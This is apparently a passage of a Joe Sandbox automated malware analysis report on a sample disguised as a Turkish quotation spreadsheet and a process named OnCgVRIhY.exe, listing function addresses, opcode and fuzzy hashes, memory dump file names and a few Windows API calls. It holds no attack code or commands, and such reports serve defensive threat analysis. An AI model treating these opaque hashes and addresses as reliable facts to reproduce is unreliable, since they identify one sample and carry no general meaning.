Instruction ID: 2884d4732e9cb8999eed65ed06bd9fc02e7d9c6b9877ad7e364d7f4ffa4edb82
Opcode Fuzzy Hash: e0ed876c677d727ca4d66ba8bc218eb03200e3e45f2679d4e9c07537036bbc01
Instruction Fuzzy Hash: 7E21E4B5D012199FCB54CFA9D984ADEBBF4EF48310F24806AE818AB255D7749944CBA0

Function 01675649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5435b319d3d6cdb2e6a24bdee1313464d291646eb79a8adeef04007785852172
Instruction ID: e3816267a38af796dddc28ad88c07a1c464512cfa1d67e145ce37374a8cd8ff6
Opcode Fuzzy Hash: 5435b319d3d6cdb2e6a24bdee1313464d291646eb79a8adeef04007785852172
Instruction Fuzzy Hash: E6213271605219CFCB02EF68E8887AA7FB1FB45310F4084A9F9069B355CB38CD19DBA0

Function 05B987F0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed3d9e8659fc931c12defa2dc423b4f6f9ad148c843b16ef6ed69ff7c1f5483e
Instruction ID: 43170a6597b26e484260f97d371e50558deb74e4d616f5a98a1978380522954b
Opcode Fuzzy Hash: ed3d9e8659fc931c12defa2dc423b4f6f9ad148c843b16ef6ed69ff7c1f5483e
Instruction Fuzzy Hash: DE1157327041501FCF0AAF7888146AF3FA3EFD6200B5085B9E506DB382DE348D06A3A2

Function 01679761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc32430d976976d264f7b5da60839a9c61e933af60be0ca5a5cfa476be381e6
Instruction ID: 91d5ce8e4d85a8d1c9a0f1fd5a4aa32a48246758148f2ef26ecc5a9ca418b2c6
Opcode Fuzzy Hash: 7dc32430d976976d264f7b5da60839a9c61e933af60be0ca5a5cfa476be381e6
Instruction Fuzzy Hash: 80218774A012489FDB05CFA9D980AAEBFB6EF89318F148069E415A6390DB349941DB20

Function 0167F312 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7de5e7421798b1c5d9097ba73a6e9eb652d63563e4b8fac6e7efae385db6286
Instruction ID: e61111f9396fa73d6b557461888fd4ce66c93ae18f4df937cde01d35bce7c15c
Opcode Fuzzy Hash: a7de5e7421798b1c5d9097ba73a6e9eb652d63563e4b8fac6e7efae385db6286
Instruction Fuzzy Hash: 03214AB4A001099FDB05EFA8D980B9EBFF1FF84304F50D5A9D015AB255EB385A458B80

Function 01676300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3f469106aae821f1a4140453ad193dcc3a6e7bd791e98c1cb1f5819cc5fc33
Instruction ID: a0266470205ef5c71b0ff5524948acc88840eef5b71a324501772bd387a6e034
Opcode Fuzzy Hash: 0f3f469106aae821f1a4140453ad193dcc3a6e7bd791e98c1cb1f5819cc5fc33
Instruction Fuzzy Hash: C3118E35300A119FE71A9A2AD89892EBFA6FFC57713084069E906CB760CF21DC02CB90

Function 05B98338 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3823568ebe63f9de52d9aee3ca1fe92240e6fb7f25fe885b0a15952fe7971447
Instruction ID: 50d58450d01a45f92b28331a38ec42da40ce888b4c8a31bcd851331112f0bfe0
Opcode Fuzzy Hash: 3823568ebe63f9de52d9aee3ca1fe92240e6fb7f25fe885b0a15952fe7971447
Instruction Fuzzy Hash: 9A1137B6800249DFDF10CF99C844BDEBFF5EB48320F148469EA19A7211C379A950DFA5

Function 016727F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11976733a57ab573c3fa046400cc0698c1d3685f96091a0d12ff8bf469dc7f2
Instruction ID: 6633a4dda00c2161eaff21ac08f13fe146e837123e95d303698785f93c5aa262
Opcode Fuzzy Hash: d11976733a57ab573c3fa046400cc0698c1d3685f96091a0d12ff8bf469dc7f2
Instruction Fuzzy Hash: 7821D3B4D106098FCB40EFA9D9456EEBFF4FF49301F10416AE805B6210EB316A88DF91

Function 05B97FD9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8485527f4d3264f20d70f1f892df72a79bcb336fba49f451215c75dbeb0f36fc
Instruction ID: 6f840b05f0e717f776c02bd8c25c4b9ab0443e9764e8d61c65fe9cb997fab60f
Opcode Fuzzy Hash: 8485527f4d3264f20d70f1f892df72a79bcb336fba49f451215c75dbeb0f36fc
Instruction Fuzzy Hash: 0F11E574E041498FDF04DBB8D950BAEBBB2AF49315F1195A1E848AB349EA34A9418B50

Function 0167F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8901030fbc4a91a5b19fbb36ae1264f70ffaaa4d6c7d243dc0aea04e82423f
Instruction ID: cedb59781f3ad1f12564ae9fa9c2d0b2080f6a9ef2d5e0b6592c169d80630474
Opcode Fuzzy Hash: fa8901030fbc4a91a5b19fbb36ae1264f70ffaaa4d6c7d243dc0aea04e82423f
Instruction Fuzzy Hash: 52113AB4E001099FDB45EFA8D980A9EBFF2FF84304F50D5A9D019AB255EB385E458B81

Function 012BD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513167414.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12bd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 6454f387ef0cb68e1a5f06d095b560c504a0c93b0d6b775b7e138b943a3f2ada
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 7F11DD75504288CFDB12CF54C9C4B56BFA2FB84318F24CAADD9494B256C33AD44ACF62

Function 01675E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28729d2440ea3391ab483192b7a527fe2920eab69691d50f378da82eabdd088
Instruction ID: 4c7444d7ffa4e1e21d0777c7d21b6cd4057754c3b17be2dcbbe6278b0301788f
Opcode Fuzzy Hash: c28729d2440ea3391ab483192b7a527fe2920eab69691d50f378da82eabdd088
Instruction Fuzzy Hash: 1801D4327001156FDB019E98AC51BAF3FEAEBC8360F54806AF906D7380DE718D169B90

Function 05B98A99 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94506a2c9f04c59ab8fc4c5ed83dc471f37bb71c3f30d16514110aed81a1473f
Instruction ID: 4307c3247d74af4d0205710fc7d830dd73b44e49f8e79d192a37e1ec9f906aa9
Opcode Fuzzy Hash: 94506a2c9f04c59ab8fc4c5ed83dc471f37bb71c3f30d16514110aed81a1473f
Instruction Fuzzy Hash: C31134B6800249DFCB11CF99C945BDEBFF4EF48320F18845AE618A7251C339A550DFA4

Function 0167ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed7e5bd5ad88bd0602276ac7ab0545a657a7569b34391fb7fdcaf2f17446158
Instruction ID: b5b2829c27a714a7526aed20b76e506a021311c26f4c0734af620b070ab6a62f
Opcode Fuzzy Hash: eed7e5bd5ad88bd0602276ac7ab0545a657a7569b34391fb7fdcaf2f17446158
Instruction Fuzzy Hash: A2F0F6313006105F97169A7EDC54A2EBAEEEFC8A6134D407AE909C7361EF21CC038780

Function 0167E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea05744a40ef0f26fd9fc841e911244453e20df013f61f50aeb0a3debea26b20
Instruction ID: 93cacd48462012c23f748b24438754132f9c265ac4c9e9862bfef87b83765a2c
Opcode Fuzzy Hash: ea05744a40ef0f26fd9fc841e911244453e20df013f61f50aeb0a3debea26b20
Instruction Fuzzy Hash: 060117B9E0020AAFCB40DFA8E944AAEBBB1FB88300F108075D915B3350D7395A15CF91

Function 05B98860 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4526590102.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5b90000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ca9fa2de1a73a8c0df39288f0fa73ea1f25fa5decd13d9dc05c0aefe62774c
Instruction ID: bd7ee777aaecd901fe65a2496f147cfedff89fa5aafea4fe54c5dd5ef1ad81cd
Opcode Fuzzy Hash: 68ca9fa2de1a73a8c0df39288f0fa73ea1f25fa5decd13d9dc05c0aefe62774c
Instruction Fuzzy Hash: B5F089323001196F9F059E9898409EF7BABEBC8250B904029FA05C7250DB71981157A5

Function 016728AA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd219274638982b8107aff09472adc52bc02d3430b52fd26697bcec69955faab
Instruction ID: 4d5426cac510b68dd645d0b33295f049be5f6126599e6e07637f01b66d01686b
Opcode Fuzzy Hash: fd219274638982b8107aff09472adc52bc02d3430b52fd26697bcec69955faab
Instruction Fuzzy Hash: C8E0C232D2022F97CB00E6A5DC044EFBB38EEC2360B944626D42033504EB30365882E0

Function 016728B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6db1718ce3e502940cf2e16faf8eadf09d7c3a171aeab7ac7f0bc7a29110f2d
Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
Opcode Fuzzy Hash: b6db1718ce3e502940cf2e16faf8eadf09d7c3a171aeab7ac7f0bc7a29110f2d
Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1

Function 01676739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef038a4ef6fcbe3efb2df026b3b16f6da17441f97075ecee30ea3637d41e369
Instruction ID: d43af548bd1c9feaa1970d3af9c33cba6644b0666dc5499a86322bfeb3aa0fef
Opcode Fuzzy Hash: 9ef038a4ef6fcbe3efb2df026b3b16f6da17441f97075ecee30ea3637d41e369
Instruction Fuzzy Hash: AFD05E762147090BC702FB7CED467997F2AEFC0324FD48931F0454AA46EE6C58864661

Function 0167AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95f363ec24304c13090776310171a9af9eef199767c59c54b0cd6944275782f
Instruction ID: 47e040da4271217c95e4f984dc2e9f19cf8631fea616176c4080fba7fd13c0a5
Opcode Fuzzy Hash: e95f363ec24304c13090776310171a9af9eef199767c59c54b0cd6944275782f
Instruction Fuzzy Hash: 47D0677AB500189FCB049F98E8419DDFB76FB98321B448117F915A3261C6319965DB50

Function 01676748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4052018cdbde88d30e3eba5dd5e8171b10da65321a89c8745c32badc67cbe0e4
Instruction ID: 7f31d4e5ce5902be748bf0950c490adeb1e99ea9853c0cb2254dbf72e2752de2
Opcode Fuzzy Hash: 4052018cdbde88d30e3eba5dd5e8171b10da65321a89c8745c32badc67cbe0e4
Instruction Fuzzy Hash: 82C01274014B094BC602FF65ED465557B2EEFD0300BC0DE20B10606A4AEE7D6C854690

Non-executed Functions

Function 016748CD Relevance: 8.8, Strings: 7, Instructions: 67COMMON

Download Yara Rule

Strings

Kq^, xrefs: 016748DA
Kq^, xrefs: 016748EA
p, xrefs: 01674912
p, xrefs: 016748D2
p, xrefs: 01674922
p, xrefs: 01674962
Kq^, xrefs: 01674939

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: Kq^$Kq^$Kq^$p$p$p$p
API String ID: 0-541182707
Opcode ID: 35d9209410babd70e719f6e2ca82c503f78388179b70ef949a582e6faf94fcd8
Instruction ID: bf8732e23b45b7baeb5fdf5c61c5186b4c263561e4477d19dc3858f858987a95
Opcode Fuzzy Hash: 35d9209410babd70e719f6e2ca82c503f78388179b70ef949a582e6faf94fcd8
Instruction Fuzzy Hash: C5116652C0E3C95FD31B47395C986A53F749E27154F0A06D7C8D8CB1E7F9181A1AC762

Function 01676920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;cq, xrefs: 01676936
\;cq, xrefs: 0167692C
\;cq, xrefs: 0167695E
\;cq, xrefs: 01676952

Memory Dump Source

Source File: 00000009.00000002.4514233202.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1670000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: \;cq$\;cq$\;cq$\;cq
API String ID: 0-2961067002
Opcode ID: 9a78871c4937fc7a28470a1fe3981711a050f1520e15b14c4cd49a5ff2efc526
Instruction ID: 121734bf4e8375b87c6e29e39241866c36838e21cef0341d08b2942b292f5154
Opcode Fuzzy Hash: 9a78871c4937fc7a28470a1fe3981711a050f1520e15b14c4cd49a5ff2efc526
Instruction Fuzzy Hash: 0C01F231700A06CFFB248E2DC8409A63BE6BFC8760725406AE506CB3B5EB31DC428790

Analysis Process: OnCgVRIhY.exePID: 7472, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	220
Total number of Limit Nodes:	15

Executed Functions

Function 02B9B0A8 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9B2FE

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a35390c6b7890a572ddf2de4da8441b5d5da175814217314c782a34e80cba5f7
Instruction ID: 902141f71c70d66266b583b5c61f9b2b367373542b8f8c3e7a24da8db5d72d97
Opcode Fuzzy Hash: a35390c6b7890a572ddf2de4da8441b5d5da175814217314c782a34e80cba5f7
Instruction Fuzzy Hash: 577110B0A10B058FDB24DF2AD44575ABBF1FF88308F00896AD48AD7A50DB74E985CF91

Function 052A1408 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052A1E0A

Memory Dump Source

Source File: 0000000A.00000002.2134150778.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_52a0000_OnCgVRIhY.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 958ed785de34d328dee0904adb124ed0cbef75d441c91f16fbc3f66082e7278d
Instruction ID: 1ae7ea52dd9d8d310baa95baa3a73ec8af75a23f9f03ec23c6d2ffb2c99c1e10
Opcode Fuzzy Hash: 958ed785de34d328dee0904adb124ed0cbef75d441c91f16fbc3f66082e7278d
Instruction Fuzzy Hash: 0F51CEB1D103499FDB14CF99C984ADEBBB5FF48310F24812AE819AB211D7B4A845CF90

Function 052A1CEC Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052A1E0A

Memory Dump Source

Source File: 0000000A.00000002.2134150778.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_52a0000_OnCgVRIhY.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f48042ec1393d5ec9ed0a4e252d895a7449250bc30838d1f01448d413a1a625f
Instruction ID: e97392433365bf574a8ff9c8e325444edd7d48bea140901be239e35406f81740
Opcode Fuzzy Hash: f48042ec1393d5ec9ed0a4e252d895a7449250bc30838d1f01448d413a1a625f
Instruction Fuzzy Hash: 5851DFB1D103499FDB14CF9AC984ADEBFB5FF48310F24812AE819AB211D771A945CF90

Function 052A155C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 052A4381

Memory Dump Source

Source File: 0000000A.00000002.2134150778.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_52a0000_OnCgVRIhY.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4384c6c70235674e98b82aa941ec247a3e550581c08721db0c30166ee2ee9a24
Instruction ID: 9e1eae02781134fb1aff03a05efeff5c29da65e2234d0e098adf2f2ed200ca73
Opcode Fuzzy Hash: 4384c6c70235674e98b82aa941ec247a3e550581c08721db0c30166ee2ee9a24
Instruction Fuzzy Hash: 604109B5A10305DFCB14DF99C848AAABBF5FF88314F248459E519AB321D7B4A841CFA4

Function 02B944B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B959C9

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e19fb50c1d5b96c745478c33d78cd158e7b4749371a8486924488ebf1b70dddf
Instruction ID: fbcbe1e22928696b86790427a09e6d57e4e7e9482ab4a9644c0e956d39071677
Opcode Fuzzy Hash: e19fb50c1d5b96c745478c33d78cd158e7b4749371a8486924488ebf1b70dddf
Instruction Fuzzy Hash: AA41CEB1C00719CBDF24CFA9C884A9EBBF5FF48304F6081AAD408AB251DB756949CF94

Function 02B9590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B959C9

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 22a7e9de49aaeca560b35944a13cc77bb221697a5327d1a414ba318cca9b4ce2
Instruction ID: 9df776780d9a0ad2ff5ffe67e5158387ce5d972ae586332bb3d908ce22397847
Opcode Fuzzy Hash: 22a7e9de49aaeca560b35944a13cc77bb221697a5327d1a414ba318cca9b4ce2
Instruction Fuzzy Hash: AC41E0B1C00719CEDF24CFA9C884B8EBBF1BF48304F6081AAD408AB255DB756949CF94

Function 02B9D0B8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9D54E,?,?,?,?,?), ref: 02B9D60F

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 90aa657b403c129343878dfeb780c9558f1e8b3199c335650444baff4319ced9
Instruction ID: 3f149b8e3ef85b954a1416d61031b3fa108cbfa532b7690ab13acbd88175d8e6
Opcode Fuzzy Hash: 90aa657b403c129343878dfeb780c9558f1e8b3199c335650444baff4319ced9
Instruction Fuzzy Hash: 5421E6B59002499FDB10CF9AD984ADEFFF4FB58314F14845AE918A3311D374A954CFA4

Function 02B9D581 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9D54E,?,?,?,?,?), ref: 02B9D60F

Memory Dump Source

Source File: 0000000A.00000002.2131378915.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b90000_OnCgVRIhY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8182534afd2cecc3201b73821f372354a6152cd4b35a288aef55941072cd57dc
Instruction ID: ebaced496216df8a0795a05af4c83fae2367afb93f5db20e1ca60c3b8cfbb1a4
Opcode Fuzzy Hash: 8182534afd2cecc3201b73821f372354a6152cd4b35a288aef55941072cd57dc
Instruction Fuzzy Hash: 6E21E4B6D002099FDB10CF99D984ADEBBF4FB48310F14845AE918A3310D378A954CF65

Function 07592998 Relevance: 1.5, APIs: 1, Instructions: 49
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 075929FD

Memory Dump Source

Source File: 0000000A.00000002.2135416227.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7590000_OnCgVRIhY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 49e272978ee199b37dc031acf491095cc19a7a9778b43a67490b16ad8acc445b
Instruction ID: dcb1c1583f995038933ef3e15605bb1a5b1bd70b919fac4106ca23958c337a1e
Opcode Fuzzy Hash: 49e272978ee199b37dc031acf491095cc19a7a9778b43a67490b16ad8acc445b
Instruction Fuzzy Hash: D91113B68003499FDB20DF99D948BDEBFF4FB48320F20845AD558A7241C375A984CFA1

Function 07592310 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 075929FD

Memory Dump Source

Source File: 0000000A.00000002.2135416227.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7590000_OnCgVRIhY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 390894d868d992d499fa7acf54a56076fbc9c4b8e4e129d3fc87e002e5daea30
Instruction ID: abb12e3b276e6bfa70f0398824903cf7ba2fadcdf25177c4c8b075272772157d
Opcode Fuzzy Hash: 390894d868d992d499fa7acf54a56076fbc9c4b8e4e129d3fc87e002e5daea30
Instruction Fuzzy Hash: BC11F5B58043499FDB20DF9AC944BDEBBF8FB48320F108419E518A7241C375A944CFA5

Function 02B9B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

